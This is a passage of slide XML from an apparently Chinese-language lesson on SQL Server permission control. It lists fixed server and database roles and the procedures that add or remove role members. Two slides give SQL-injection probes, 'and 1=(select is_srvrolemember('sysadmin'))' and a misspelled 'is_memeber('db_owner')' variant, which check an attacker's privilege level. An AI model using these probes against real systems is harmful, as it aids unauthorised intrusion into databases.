                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>setupadmin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>安装复制和管理扩展过程</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="314830">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>securityadmin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>管理登录和CREATE DATABASE的权限以及阅读审计</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="250433">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>processadmin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>管理SQL Server进程</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                        <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="226620">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>dbcreator</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>创建和修改数据库</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="396605">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>diskadmin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>管理磁盘文件</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092527" y="2789767"/>
            <a:ext cx="5228167" cy="340355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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pP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下面两个系统过程用来添加删除固定服务器角色成员：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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        sp_addsrvrolemember</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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        sp_dropsrvrolemember</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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注意：只有固定服务器角色的成员才能执行上述两个系</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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统过程来从角色中添加或删除登录账户。我们自己是不</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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可以添加、修改和删除固定服务器角色的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">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我们可以通过语句判断权限：</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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and 1=(select is_srvrolemember('sysadmin'))</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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15807" y="1198880"/>
            <a:ext cx="11917680" cy="81823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marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>固定数据库角色在数据库层上进行定义，因此它们存在于属于数据库服务器的每个数据库中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下表列出了所有的固定数据库角色。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>我们可以通过语句判断权限：and 1=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>is_memeber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>('db_owner')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Title 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143840" y="335251"/>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权限控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="315808" y="941493"/>
            <a:ext cx="6882553" cy="36932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marL="380990" indent="-380990" defTabSz="1219170" hangingPunct="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>固定数据库角色</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1694897168"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5921977" y="2514600"/>
          <a:ext cx="5954216" cy="4208871"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1856479">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4097737">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="344277">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>固定数据库角色</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>说明</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344277">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>db_owner</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960">
                    <a:solidFill>
                      <a:srgbClr val="F7F7F7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>可以执行数据库中技术所有动作的用户</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960">
                    <a:solidFill>
                      <a:srgbClr val="F7F7F7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344277">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>db_accessadmin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>可以添加、删除用户的用户</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344277">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>db_datareader</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960">
                    <a:solidFill>
                      <a:srgbClr val="F7F7F7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>可以查看所有数据库中用户表内数据的用户</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960">
                    <a:solidFill>
                      <a:srgbClr val="F7F7F7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="497289">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>db_datawriter</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>可以添加、修改或删除所有数据库中用户表内数据的用户</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344277">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>db_ddladmin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960">
                    <a:solidFill>
                      <a:srgbClr val="F7F7F7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>可以在数据库中执行所有</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>DDL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>操作的用户</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960">
                    <a:solidFill>
                      <a:srgbClr val="F7F7F7"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344277">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>db_securityadmin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>可以管理数据库中与安全权限有关所有动作的用户</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="121920" marR="121920" marT="60960" marB="60960"/>
                </a:tc>
                <a:extLst>
